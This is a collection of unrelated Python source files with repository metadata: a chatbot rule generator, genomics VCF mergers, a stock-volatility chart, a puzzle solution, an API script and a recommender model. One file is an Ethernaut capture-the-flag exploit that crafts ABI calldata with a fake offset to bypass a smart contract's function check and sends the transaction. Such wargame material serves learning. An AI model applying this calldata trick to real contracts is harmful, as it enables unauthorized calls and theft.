self.rules])\n if self.name.endswith('_gen'):\n default_rule = '\\nu: SET_VAR ()\\n\\t$do_review = null\\n\\n'\n search_rule_text = ''\n else:\n default_rule = (\n '\\nu: SET_VAR ()\\n\\t$quest = %originalsentence'\n '\\n\\t$do_review = true'\n )\n search_rule_text = (\n 'u: SEARCH_RULE ()\\n'\n '\\t$res = ^search_rule(%originalsentence %topic) / 256\\n'\n '\\tif($res<{max_return}){{\\n'\n '\\t\\t^reuse(^join(U $res))\\n'\n '\\t}}else{{\\n'\n '\\t\\t$go_to_menu = false\\n'\n '\\t\\t^respond(~topics)\\n'\n '\\t\\tif (%response == $_responseCount){{\\n'\n '\\t\\t\\t^respond(~{name})\\n'\n '\\t\\t}}\\n'\n '\\t}}\\n'\n ).format(name=self.name+'_gen', max_return=self.max_return_code)\n\n # create plurals to keywords\n plurals = self.generate_keywords_plurals()\n # remove repeated words\n total_keywords = ' '.join(\n set(' '.join(self.keywords + plurals).split(' '))\n )\n\n top_header = (\n u'topic: ~{name} keep repeat {random}({keywords})\\n{default_rule}'\n ).format(\n name=self.name,\n random=self.random,\n keywords=total_keywords,\n default_rule=default_rule\n )\n\n return top_header + rules_text + '\\n\\n\\n' + 
search_rule_text\n","repo_name":"lplnufpi/chatscript_generator","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25286708797","text":"from Modules import Merger\n\nclass VCFMerger(Merger):\n\n def __init__(self, module_id, is_docker=False):\n super(VCFMerger, self).__init__(module_id, is_docker)\n self.output_keys = [\"vcf\"]\n\n def define_input(self):\n self.add_argument(\"vcf\", is_required=True)\n self.add_argument(\"snpsift\", is_required=True, is_resource=True)\n self.add_argument(\"nr_cpus\", is_required=True, default_value=\"MAX\")\n self.add_argument(\"mem\", is_required=True, default_value=\"MAX\")\n\n # Conditionally require java if not docker\n if not self.is_docker:\n self.add_argument(\"java\", is_required=True, is_resource=True)\n\n def define_output(self):\n # Declare name of merged VCF output file\n vcf_out = self.generate_unique_file_name(extension=\".vcf\")\n self.add_output(\"vcf\", vcf_out)\n\n def define_command(self):\n # Get input arguments\n vcf_list = self.get_argument(\"vcf\")\n snpsift = self.get_argument(\"snpsift\")\n vcf_out = self.get_output(\"vcf\")\n\n # Generating JVM options\n if not self.is_docker:\n java = self.get_argument(\"java\")\n mem = self.get_argument(\"mem\")\n jvm_options = \"-Xmx%dG -Djava.io.tmpdir=/tmp/\" % (mem * 9 / 10)\n snpsift_cmd = \"{0} {1} -jar {2}\".format(java, jvm_options, snpsift)\n else:\n snpsift_cmd = str(snpsift)\n\n # Generating SnpEff command\n return \"{0} sort {1} > {2} !LOG2!\".format(snpsift_cmd, \" \".join(vcf_list), vcf_out)\n\n\nclass BGZipVCFMerger(Merger):\n\n def __init__(self, module_id):\n super(BGZipVCFMerger, self).__init__(module_id)\n self.output_keys = [\"vcf\"]\n\n def define_input(self):\n self.add_argument(\"vcf_gz\", is_required=True)\n self.add_argument(\"vcf_csi\", is_required=True)\n self.add_argument(\"bcftools\", is_required=True, is_resource=True)\n self.add_argument(\"nr_cpus\", is_required=True, default_value=4)\n self.add_argument(\"mem\", is_required=True, default_value=\"nr_cpus*4\")\n\n def define_output(self):\n # Declare recoded VCF output filename\n vcf_out = self.generate_unique_file_name(extension=\".vcf\")\n self.add_output(\"vcf\", vcf_out)\n\n def define_command(self):\n # Get input arguments\n vcf_gz = self.get_argument(\"vcf_gz\")\n bcftools = self.get_argument(\"bcftools\")\n vcf_out = self.get_output(\"vcf\")\n # Get final normalized VCF output file path\n cmd = \"%s merge -F x %s > %s !LOG2!\" % (bcftools, \" \".join(vcf_gz), vcf_out)\n return cmd\n\n\nclass RecodedVCFMerger(Merger):\n\n def __init__(self, module_id, is_docker=False):\n super(RecodedVCFMerger, self).__init__(module_id, is_docker)\n self.output_keys = [\"recoded_vcf\"]\n\n def define_input(self):\n self.add_argument(\"recoded_vcf\", is_required=True)\n self.add_argument(\"cat_recoded_vcf\", is_required=True, is_resource=True)\n self.add_argument(\"nr_cpus\", is_required=True, default_value=8)\n self.add_argument(\"mem\", is_required=True, default_value=16)\n\n def define_output(self):\n # Declare merged samtools depth output filename\n recoded_vcf_out = self.generate_unique_file_name(extension=\".recoded.vcf.txt\")\n self.add_output(\"recoded_vcf\", recoded_vcf_out)\n\n def define_command(self):\n cat_recode_vcf = self.get_argument(\"cat_recoded_vcf\")\n recode_vcf_in = self.get_argument(\"recoded_vcf\")\n recode_vcf_out = self.get_output(\"recoded_vcf\")\n\n # 
Generate cat recoded VCF command\n\n # Install pyvcf prior to runtime if not running in docker\n if not self.is_docker:\n return \"sudo pip install -U pyvcf ; python %s -i %s -vvv --output %s !LOG2!\" % (cat_recode_vcf, \" \".join(recode_vcf_in), recode_vcf_out)\n\n # Otherwise just let it rip\n return \"%s -i %s -vvv --output %s !LOG2!\" % (cat_recode_vcf, \" \".join(recode_vcf_in), recode_vcf_out)\n\n\nclass VCFSummaryMerger(Merger):\n def __init__(self, module_id, is_docker=False):\n super(VCFSummaryMerger, self).__init__(module_id, is_docker)\n self.output_keys = [\"vcf_summary\"]\n\n def define_input(self):\n self.add_argument(\"vcf_summary\", is_required=True)\n self.add_argument(\"cat_vcf_summary\", is_required=True, is_resource=True)\n self.add_argument(\"nr_cpus\", is_required=True, default_value=8)\n self.add_argument(\"mem\", is_required=True, default_value=16)\n\n def define_output(self):\n # Declare merged samtools depth output filename\n vcf_summary_out = self.generate_unique_file_name(extension=\".summary.txt\")\n self.add_output(\"vcf_summary\", vcf_summary_out)\n\n def define_command(self):\n cat_vcf_summary = self.get_argument(\"cat_vcf_summary\")\n vcf_summary_in = self.get_argument(\"vcf_summary\")\n vcf_summary_out = self.get_output(\"vcf_summary\")\n\n # Generate command to merge VCF summaries\n\n # Install pyVCF before running if not running in Docker\n if not self.is_docker:\n return \"sudo pip install -U pyvcf ; python %s -i %s -vvv > %s !LOG2!\" % (cat_vcf_summary, \" \".join(vcf_summary_in), vcf_summary_out)\n\n return \"%s -i %s -vvv > %s !LOG2!\" % (cat_vcf_summary, \" \".join(vcf_summary_in), vcf_summary_out)","repo_name":"alexwaldrop/GAP","sub_path":"Modules/Mergers/VCFMergers.py","file_name":"VCFMergers.py","file_ext":"py","file_size_in_byte":5511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"9262809328","text":"from ethpwn import *\n\ndef p256(x):\n return x.to_bytes(32, 'big')\n\nswitch = contract_registry().get(contract_by_label('SwitchInstance0'))\nassert switch is not None\n\nimport ipdb; ipdb.set_trace()\noffset = 0x20 + 0x20 + 4\ncalldata = b''.join([\n keccak256('flipSwitch(bytes)')[:4],\n\n # offset starts calculating from here (bytes object is `offset -> (len, data)`)\n p256(offset), # first 0x20 skips this\n\n # fake data: 0x20 + 4 bytes\n p256(0x20),\n keccak256('turnSwitchOff()')[:4],\n\n # actual data here @ 0x20+0x20+4\n p256(0x20),\n keccak256('turnSwitchOn()')[:4],\n])\n\n# debug_simulated_transaction(\n# encode_transaction(\n# to=switch.address,\n# data=calldata,\n# from_addr=context.default_from_addr,\n# )\n# )\ntx_hash, *tx_extra = transact(to=switch.address, data=calldata, force=True)\n# debug_onchain_transaction(tx_hash)","repo_name":"Lukas-Dresel/ethernaut-ethpwn-solutions","sub_path":"switch/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18387907896","text":"import numpy as np\nimport pandas_datareader as pdr\nimport datetime as dt\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nstart = dt.datetime(2020, 1, 1)\ndata = pdr.get_data_yahoo(\"NFLX\", start)\n\n\"\"\" The Average True Range (ATR) is a moving average of the True Range (TR).\n And the TR is given by the maximum of the current high (H) minus current low (L), \n the absolute value of current high (H) minus previous close (Cp), \n and the absolute value of current 
low (L) and previous close (Cp). \"\"\"\n\n# using .shift() to get the previous close\nhigh_low = data['High'] - data['Low']\nhigh_cp = np.abs(data['High'] - data['Close'].shift())\nlow_cp = np.abs(data['Low'] - data['Close'].shift())\n\n# creating data frame with max values\ndf = pd.concat([high_low, high_cp, low_cp], axis=1)\ntrue_range = np.max(df, axis=1)\n\n# ATR as moving average\naverage_true_range = true_range.rolling(14).mean()\n\n# visualisation of the data on the simple chart\nfig, ax = plt.subplots()\naverage_true_range.plot(ax=ax)\nax2 = data['Close'].plot(ax=ax, secondary_y=True, alpha=.3)\nax.set_ylabel(\"ATR\")\nax2.set_ylabel(\"Price\")\nplt.show()\n\n\n\n\n\n\n\n\n","repo_name":"vid962/ATR-Stocks-Volatilyty-Pandas","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33672208201","text":"from collections import deque\nimport copy\nn, m = map(int, input().split())\n\nvirus = []\nlab = []\nno_safe = 0\nfor i in range(n):\n row = list(map(int, input().split()))\n for j, v in enumerate(row):\n if v == 2:\n virus.append((i, j))\n no_safe += 1\n elif v == 1:\n no_safe += 1\n \n lab.append(row)\n\ndef bfs(start, lab_copy, n, m):\n q = deque([])\n dx = [1, -1, 0, 0]\n dy = [0, 0, 1, -1]\n q.append(start)\n cnt = 0\n while q:\n x, y = q.popleft()\n\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n\n if 0 <= nx < n and 0 <= ny < m and lab_copy[nx][ny] == 0:\n lab_copy[nx][ny] = 2\n q.append((nx,ny))\n cnt += 1\n return cnt\nsafe = 0\nfor i in range(n*m):\n for j in range(i+1, n*m):\n for k in range(j+1, n*m):\n if lab[i//m][i%m] != 0 or lab[j//m][j%m] != 0 or lab[k//m][k%m] != 0:\n continue\n lab_copy = copy.deepcopy(lab)\n lab_copy[i//m][i%m] = 1\n lab_copy[j//m][j%m] = 1\n lab_copy[k//m][k%m] = 1\n\n no_safe_part = 3\n for v in virus:\n no_safe_part += bfs(v, lab_copy, n, m)\n\n safe = max(safe, n*m-no_safe-no_safe_part)\nprint(safe)","repo_name":"hursuk1/coding_test","sub_path":"dfs, bfs/14502.py","file_name":"14502.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25732057262","text":"#!/usr/bin/python3\n\"\"\"\ntask0\n\"\"\"\n\n\nimport json\nimport requests\nfrom sys import argv\nif __name__ == '__main__':\n url = \"https://jsonplaceholder.typicode.com/users/\"\n url102 = \"https://jsonplaceholder.typicode.com/todos/\"\n employe = int(argv[1])\n user = requests.get(url + \"{}\".format(int(argv[1])))\n nom = user.json().get('name')\n kraya = requests.get(url102, params={\"userId\": argv[1]})\n matiere = kraya.json()\n mat_thazet = 0\n mat_gen = 0\n tabledemat = []\n for z in matiere:\n mat_gen += 1\n if z.get('completed'):\n mat_thazet += 1\n tabledemat.append(z.get(\"title\"))\n print('Employee {} is done with tasks({}/{}):'\n .format(nom, mat_thazet, mat_gen))\n for i in range(0, len(tabledemat)):\n print(\"\\t \" + tabledemat[i])\n","repo_name":"medcharfi96/holberton-system_engineering-devops","sub_path":"0x15-api/0-gather_data_from_an_API.py","file_name":"0-gather_data_from_an_API.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72326379362","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom 
tensorflow.keras.layers.experimental.preprocessing import StringLookup\nfrom ast import literal_eval\nimport re\nfrom tensorflow.python.keras.layers.advanced_activations import ReLU\n# from tensorflow.python.framework.ops import disable_eager_execution\n# disable_eager_execution()\n\nCSV_HEADER = [\"user_id\",\"occupation\",\"gender\",\"age\",\"age_squared\",\"age_power_3\",\"city\",\"state\",\"longitude\",\"latitude\",\"timezone\",\"watched_movies\",\"liked\",\"disliked\",\n \"watched_genres\",\"released\",\"movie_names\",\"days\",\"months\",\"years\",\"label\"]\nTARGET_FEATURE_NAME = \"label\"\n\n#get data\ntrain_data = pd.read_pickle(\"candidate_train_data.pkl\")\nval_data = pd.read_pickle(\"candidate_val_data.pkl\")\ntest_data = pd.read_pickle(\"candidate_test_data.pkl\")\n\n#print(train_data.head(10))\n# print(test_data.head(10))\n\n#train_data = train_data.drop([x for x in range(49000,49033)])\n\n#coverting the string back to a list and then to a np.array for the tensor\n\ndef find_words(data):\n data[\"movie_words\"] = data[\"movie_names\"].apply(lambda x: \" \".join(x))\n data[\"movie_words\"] = data[\"movie_words\"].apply(lambda x: re.findall(r\"[\\w'.]+\",x)) \n\nfind_words(train_data)\nfind_words(val_data)\nfind_words(test_data)\n#print(train_data[\"movie_words\"])\n# zip code from object to int\n# train_data[\"zip_code\"] = train_data[\"zip_code\"].apply(lambda x: int(x))\n# test_data[\"zip_code\"] = test_data[\"zip_code\"].apply(lambda x: int(x))\n\n# print(train_data.dtypes)\n# print(test_data.dtypes)\n\nall_movie_list =[]\nall_words_list =[]\ndef get_all_movie_names(data):\n for movie_list in data[\"movie_names\"]:\n for name in movie_list:\n if not(name in all_movie_list):\n all_movie_list.append(name)\n all_words_list.extend(re.findall(r\"[\\w'.]+\", name))\n\nget_all_movie_names(train_data)\nget_all_movie_names(val_data)\nget_all_movie_names(test_data)\nall_words_list = list(set(all_words_list))\n\ncity_list = []\nstate_list = []\ndef get_city_and_state(data):\n for city, state in zip(data[\"city\"],data[\"state\"]):\n if city not in city_list:\n city_list.append(city)\n if state not in state_list:\n state_list.append(state)\n\nget_city_and_state(train_data)\nget_city_and_state(val_data)\nget_city_and_state(test_data)\n\n#print(all_movie_list)\n#print(\"length of all_movie_list: \", len(all_movie_list))\n#number of movies\nTARGET_FEATURE_LABELS = [x for x in range(1682)]\nNUMERIC_FEATURE_NAMES = [\"age\",\n \"age_squared\",\n \"age_power_3\",\n \"timezone\",\n \"longitude\",\n \"latitude\",\n \"days\",\n \"months\",\n \"years\",\n ]\nNUM_LIST_FEATURE_NAMES = [\"watched_movies\", \"liked\",\n \"disliked\",\n \"watched_genres\",\n \"released\"\n ]\nCAT_LIST_FEATURE_WITH_VOCABULARY = {\n \"movie_names\": all_movie_list,\n \"movie_words\": all_words_list,\n}\nCATEGORICAL_FEATURES_WITH_VOCABULARY = {\n \"gender\": [\"M\",\"F\"],\n \"occupation\": [\"administrator\",\"artist\",\"doctor\",\"educator\",\"engineer\",\"entertainment\",\"executive\",\"healthcare\",\"homemaker\",\"lawyer\",\"librarian\",\"marketing\",\n \"none\",\"other\",\"programmer\",\"retired\",\"salesman\",\"scientist\",\"student\",\"technician\",\"writer\"], \n \"city\": city_list,\n \"state\": state_list,\n}\n\n\nCATEGORICAL_FEATURE_NAMES = list(CATEGORICAL_FEATURES_WITH_VOCABULARY.keys())\nCAT_LIST_FEATURE_NAMES = list(CAT_LIST_FEATURE_WITH_VOCABULARY.keys())\nFEATURE_NAMES = NUMERIC_FEATURE_NAMES + CATEGORICAL_FEATURE_NAMES + NUM_LIST_FEATURE_NAMES + CAT_LIST_FEATURE_NAMES #+ TIME_LIST\n\nNUM_CLASSES = 
len(TARGET_FEATURE_LABELS)+1\n\n#learning_rate = 0.0015\nlearning_rate = 0.00004\ndropout_rate = 0.05\nnum_batch_size = 8000\n#batch_size = 265\nnum_epochs = 800\nembedding_tall = 128\nembedding_medium = 16\nembedding_small = 8\n\n#init_learning_rate = 0.006\n\nhidden_units_deep = [256,128,64]\nhidden_units_cross = [1,2,3]\nhidden_units_dlrm_top = [1024,512,256]\nhidden_units_dlrm_bottom = [1024,512,256]\n\ndef create_model_inputs():\n inputs = {}\n for feature_name in FEATURE_NAMES:\n if feature_name in NUMERIC_FEATURE_NAMES:\n inputs[feature_name] = layers.Input(\n name=feature_name, shape=(), dtype=tf.float32\n )\n elif feature_name in NUM_LIST_FEATURE_NAMES:\n inputs[feature_name] = layers.Input(\n name=feature_name, shape=(None, ), dtype=tf.float32\n )\n # elif feature_name in TIME_LIST:\n # inputs[feature_name] = layers.Input(\n # name=feature_name, shape=(None, ), dtype=tf.float32\n # ) \n elif feature_name in CAT_LIST_FEATURE_NAMES:\n inputs[feature_name] = layers.Input(\n name=feature_name, shape=(None, ), dtype=tf.string\n )\n elif feature_name in CATEGORICAL_FEATURE_NAMES:\n inputs[feature_name] = layers.Input(\n name=feature_name, shape=(),dtype=tf.string\n )\n return inputs\n\ndef encode_inputs(inputs, style, use_embedding=False):\n encoded_features = []\n #print(inputs)\n for feature_name in inputs:\n #print(feature_name)\n if feature_name in CATEGORICAL_FEATURE_NAMES:\n vocabulary = CATEGORICAL_FEATURES_WITH_VOCABULARY[feature_name]\n # Create a lookup to convert string values to an integer indices.\n lookup = StringLookup(\n output_mode=\"int\" if use_embedding else \"binary\",\n vocabulary=vocabulary,\n mask_token=None,\n num_oov_indices=0,\n )\n if use_embedding:\n # Covert the string to integer indices \n encoded_feature = lookup(inputs[feature_name])\n #print(encoded_feature)\n embedding = layers.Embedding(\n input_dim=len(vocabulary), output_dim=embedding_small, input_length=1\n )\n encoded_feature = embedding(encoded_feature)\n #print(encoded_feature)\n if style == \"mean\":\n encoded_feature = tf.expand_dims(encoded_feature, -1)\n encoded_feature = tf.math.reduce_mean(encoded_feature,axis=1,name=\"mean\")\n #print(encoded_feature)\n \n if style == \"sum\":\n encoded_feature = tf.expand_dims(encoded_feature, -1)\n encoded_feature = tf.math.reduce_sum(encoded_feature,axis=1,name=\"sum\")\n \n else:\n # use lookup as is\n encoded_feature = lookup(tf.expand_dims(inputs[feature_name], -1))\n \n elif feature_name in NUM_LIST_FEATURE_NAMES:\n #list already padded\n if feature_name == \"watched_genres\":\n embedding = layers.Embedding(\n input_dim=19, output_dim=embedding_tall, mask_zero=True\n )\n if feature_name == \"released\":\n embedding = layers.Embedding(\n input_dim=2000, output_dim=embedding_tall, mask_zero=True\n )\n else:\n embedding = layers.Embedding(\n input_dim=NUM_CLASSES, output_dim=embedding_tall, mask_zero=True\n )\n \n if style == \"mean\":\n encoded_feature = tf.math.reduce_mean(embedding(inputs[feature_name]),axis=1,name=\"mean\")\n #print(encoded_feature)\n #encoded_feature = tf.expand_dims(encoded_feature, -1)\n \n if style == \"sum\":\n encoded_feature = tf.math.reduce_sum(embedding(inputs[feature_name]),axis=1,name=\"sum\")\n #encoded_feature = tf.expand_dims(encoded_feature, -1)\n \n # elif feature_name in TIME_LIST:\n # if feature_name == \"days\":\n # embedding = layers.Embedding(\n # input_dim=32, output_dim = 2, mask_zero=True\n # )\n # elif feature_name == \"months\":\n # embedding = layers.Embedding(\n # input_dim=13, output_dim = 2, 
mask_zero=True\n # )\n # elif feature_name == \"years\":\n # embedding = layers.Embedding(\n # input_dim=2000, output_dim = 4, mask_zero=True\n # )\n # if style == \"mean\":\n # encoded_feature = tf.math.reduce_mean(embedding(inputs[feature_name]),axis=1,name=\"mean\")\n # #print(encoded_feature)\n # #encoded_feature = tf.expand_dims(encoded_feature, -1)\n \n # if style == \"sum\":\n # encoded_feature = tf.math.reduce_sum(embedding(inputs[feature_name]),axis=1,name=\"sum\")\n # #encoded_feature = tf.expand_dims(encoded_feature, -1)\n\n elif feature_name in CAT_LIST_FEATURE_NAMES:\n \n vocabulary = CAT_LIST_FEATURE_WITH_VOCABULARY[feature_name]\n lookup = StringLookup(\n output_mode=\"int\" if use_embedding else \"binary\",\n vocabulary=vocabulary,\n mask_token=None,\n num_oov_indices=0,\n #oov_token= 0, \n )\n encoded_feature = lookup(inputs[feature_name])\n encoded_feature = tf.where(tf.equal(encoded_feature,-1),0,tf.cast(encoded_feature,dtype=tf.int32))\n if feature_name == \"movie_names\":\n embedding = layers.Embedding(\n input_dim=NUM_CLASSES, output_dim=embedding_medium, mask_zero=True\n )\n else: \n embedding = layers.Embedding(\n input_dim=len(vocabulary)+1, output_dim=embedding_medium, mask_zero=True\n )\n if style == \"mean\":\n encoded_feature = tf.math.reduce_mean(embedding(encoded_feature),axis=1,name=\"mean\")\n \n if style == \"sum\":\n encoded_feature = tf.math.reduce_sum(embedding(encoded_feature),axis=1,name=\"sum\")\n\n else:\n # Use the numerical features as-is.\n encoded_feature = tf.expand_dims(tf.cast(inputs[feature_name], tf.float32), -1)\n #print(encoded_feature)\n encoded_features.append(encoded_feature)\n #print(encoded_features)\n\n all_features = layers.concatenate(encoded_features)\n #print(all_features)\n return all_features\n\ndef run_experiment(model):\n\n # def loss_function(y_true,y_pred):\n # print(y_true)\n # output_layer = model.layers[-1]\n # loss = tf.nn.sampled_softmax_loss(\n # weights = tf.transpose(output_layer.weights[0]),\n # biases = output_layer.weights[1],\n # labels = y_true, \n # inputs = output_layer.input,\n # num_sampled=1400,\n # num_classes= 1682,\n # num_true= 1, \n # )\n # return loss \n # lr_schedule = keras.optimizers.schedules.ExponentialDecay(\n # init_learning_rate,\n # decay_steps=30,\n # decay_rate=0.95,\n # staircase=True\n # )\n\n class TerminateOnBaseline(keras.callbacks.Callback):\n \"\"\"Callback that terminates training when either acc or val_acc reaches a specified baseline\n \"\"\"\n def __init__(self, monitor='val_sparse_categorical_accuracy', baseline=0.022):\n super(TerminateOnBaseline, self).__init__()\n self.monitor = monitor\n self.baseline = baseline\n\n def on_epoch_end(self, epoch, logs=None):\n logs = logs or {}\n acc = logs.get(self.monitor)\n if acc is not None:\n if acc >= self.baseline:\n print('Epoch %d: Reached baseline, terminating training' % (epoch))\n self.model.stop_training = True\n\n model.compile(\n optimizer=keras.optimizers.Adam(learning_rate=learning_rate),\n loss=keras.losses.SparseCategoricalCrossentropy(),\n metrics=[keras.metrics.SparseCategoricalAccuracy()],\n experimental_run_tf_function = False,\n )\n # print(np.shape(train_data[\"age\"].values))\n #print(np.shape(train_data[\"zip_code\"].values))\n # print(np.shape(train_data[\"gender\"].values))\n # print(np.shape(train_data[\"occupation\"].values))\n # print(np.shape(tf.keras.preprocessing.sequence.pad_sequences(train_data[\"watched_movies\"])))\n # 
print(np.shape(tf.keras.preprocessing.sequence.pad_sequences(train_data[\"liked\"])))\n # print(np.shape(tf.keras.preprocessing.sequence.pad_sequences(train_data[\"disliked\"])))\n # print(np.shape(tf.keras.preprocessing.sequence.pad_sequences(train_data[\"watched_genres\"])))\n \n\n input = {\"age\": train_data[\"age\"].values,\n \"age_squared\":train_data[\"age_squared\"].values,\n \"age_power_3\":train_data[\"age_power_3\"].values,\n \"longitude\": train_data[\"longitude\"].values,\n \"latitude\": train_data[\"latitude\"].values,\n \"timezone\": train_data[\"timezone\"].values,\n \"city\": train_data[\"city\"].values,\n \"state\": train_data[\"state\"].values,\n \"gender\": train_data[\"gender\"].values,\n \"occupation\": train_data[\"occupation\"].values,\n \"watched_movies\": tf.keras.preprocessing.sequence.pad_sequences(train_data[\"watched_movies\"]),\n \"liked\": tf.keras.preprocessing.sequence.pad_sequences(train_data[\"liked\"]),\n \"disliked\": tf.keras.preprocessing.sequence.pad_sequences(train_data[\"disliked\"]),\n \"watched_genres\": tf.keras.preprocessing.sequence.pad_sequences(train_data[\"watched_genres\"]),\n \"released\": tf.keras.preprocessing.sequence.pad_sequences(train_data[\"released\"]),\n \"days\": train_data[\"days\"].values,\n \"months\": train_data[\"months\"].values,\n \"years\": train_data[\"years\"].values,\n \"movie_names\": tf.keras.preprocessing.sequence.pad_sequences(train_data[\"movie_names\"],dtype=object,value=\"yyy\"), \n \"movie_words\": tf.keras.preprocessing.sequence.pad_sequences(train_data[\"movie_words\"],dtype=object,value=\"yyy\"), \n }\n \n target = train_data[\"label\"].values\n\n val_input = {\"age\": val_data[\"age\"].values,\n \"age_squared\":val_data[\"age_squared\"].values,\n \"age_power_3\":val_data[\"age_power_3\"].values,\n \"longitude\": val_data[\"longitude\"].values,\n \"latitude\": val_data[\"latitude\"].values,\n \"timezone\": val_data[\"timezone\"].values,\n \"city\": val_data[\"city\"].values,\n \"state\": val_data[\"state\"].values,\n \"gender\": val_data[\"gender\"].values,\n \"occupation\": val_data[\"occupation\"].values,\n \"watched_movies\": tf.keras.preprocessing.sequence.pad_sequences(val_data[\"watched_movies\"]),\n \"liked\": tf.keras.preprocessing.sequence.pad_sequences(val_data[\"liked\"]),\n \"disliked\": tf.keras.preprocessing.sequence.pad_sequences(val_data[\"disliked\"]),\n \"watched_genres\": tf.keras.preprocessing.sequence.pad_sequences(val_data[\"watched_genres\"]),\n \"released\": tf.keras.preprocessing.sequence.pad_sequences(val_data[\"released\"]),\n \"days\": val_data[\"days\"].values,\n \"months\": val_data[\"months\"].values,\n \"years\": val_data[\"years\"].values,\n \"movie_names\": tf.keras.preprocessing.sequence.pad_sequences(val_data[\"movie_names\"],dtype=object,value=\"yyy\"), \n \"movie_words\": tf.keras.preprocessing.sequence.pad_sequences(val_data[\"movie_words\"],dtype=object,value=\"yyy\"), \n }\n \n val_target = val_data[\"label\"].values\n print(\"Start training the model...\")\n history = model.fit(x=input,y=target,epochs=num_epochs,validation_data=(val_input,val_target),batch_size=num_batch_size,\n callbacks=TerminateOnBaseline(\"val_sparse_categorical_accuracy\",0.022),\n shuffle=True)\n print(\"Model training finished\")\n\n fig, (ax1,ax2) = plt.subplots(1,2)\n ax1.plot(history.history[\"sparse_categorical_accuracy\"],label=\"train\")\n ax1.plot(history.history[\"val_sparse_categorical_accuracy\"],label=\"validation\")\n ax1.legend(loc=\"upper left\")\n ax1.set_xlabel(\"epoch\")\n 
ax1.set_ylabel(\"sparse categortical accuracy\")\n ax1.set_title(\"model accuracy\")\n\n\n ax2.plot(history.history[\"loss\"],label=\"train\")\n ax2.plot(history.history[\"val_loss\"],label=\"validation\")\n ax2.legend(loc=\"upper right\")\n ax2.set_xlabel(\"epoch\")\n ax2.set_ylabel(\"loss\")\n ax2.set_title(\"model loss\")\n #fig.set_legend([\"training\",\"validation\"])\n plt.show()\n \n input = {\"age\": test_data[\"age\"].values,\n \"age_squared\":test_data[\"age_squared\"].values,\n \"age_power_3\":test_data[\"age_power_3\"].values,\n \"longitude\": test_data[\"longitude\"].values,\n \"latitude\": test_data[\"latitude\"].values,\n \"timezone\": test_data[\"timezone\"].values,\n \"city\": test_data[\"city\"].values,\n \"state\": test_data[\"state\"].values,\n \"gender\": test_data[\"gender\"].values,\n \"occupation\": test_data[\"occupation\"].values,\n \"watched_movies\": tf.keras.preprocessing.sequence.pad_sequences(test_data[\"watched_movies\"]),\n \"liked\": tf.keras.preprocessing.sequence.pad_sequences(test_data[\"liked\"]),\n \"disliked\": tf.keras.preprocessing.sequence.pad_sequences(test_data[\"disliked\"]),\n \"watched_genres\": tf.keras.preprocessing.sequence.pad_sequences(test_data[\"watched_genres\"]),\n \"released\": tf.keras.preprocessing.sequence.pad_sequences(test_data[\"released\"]),\n \"days\": test_data[\"days\"].values,\n \"months\": test_data[\"months\"].values,\n \"years\": test_data[\"years\"].values,\n \"movie_names\": tf.keras.preprocessing.sequence.pad_sequences(test_data[\"movie_names\"],dtype=object,value=\"yyy\"),\n \"movie_words\": tf.keras.preprocessing.sequence.pad_sequences(test_data[\"movie_words\"],dtype=object,value=\"yyy\"), \n }\n\n target = test_data[\"label\"].values\n\n _, accuracy = model.evaluate(x=input,y=target, batch_size = 20, verbose = 2)\n print(f\"Test accuracy: {round(accuracy*100, 2)}%\")\n print(\"learning rate:\", learning_rate)\n print(\"batch size:\", num_batch_size)\n\n model.save(\"model_candidate\")\n\n\ndef create_dlrm_inputs():\n num_inputs = {}\n cat_inputs = {}\n for feature_name in NUMERIC_FEATURE_NAMES:\n num_inputs[feature_name] = layers.Input(name=feature_name, shape=(), dtype=tf.float32)\n for feature_name in CATEGORICAL_FEATURE_NAMES:\n cat_inputs[feature_name] = layers.Input(name=feature_name, shape = (), dtype = tf.string)\n return num_inputs, cat_inputs\n\ndef create_wide_and_deep_model():\n inputs = create_model_inputs()\n wide = encode_inputs(inputs, style=\"mean\", use_embedding=False)\n wide = layers.BatchNormalization()(wide)\n\n deep = encode_inputs(inputs, style=\"mean\", use_embedding=True)\n deep = layers.BatchNormalization()(deep)\n for units in hidden_units_deep:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n\n merged = layers.concatenate([wide,deep])\n outputs = layers.Dense(units=NUM_CLASSES, activation=\"softmax\")(merged)\n model = keras.Model(inputs=inputs, outputs=outputs)\n return model\n\ndef create_deep_and_cross_model():\n\n inputs = create_model_inputs()\n x0 = encode_inputs(inputs, style=\"mean\", use_embedding=True)\n\n cross = x0\n for _ in hidden_units_cross:\n units = cross.shape[-1]\n x = layers.Dense(units)(cross)\n cross = x0 * x + cross\n cross = layers.BatchNormalization()(cross)\n\n deep = x0\n for units in hidden_units_deep:\n deep = layers.Dense(units)(deep)\n deep = layers.BatchNormalization()(deep)\n deep = layers.ReLU()(deep)\n deep = layers.Dropout(dropout_rate)(deep)\n\n 
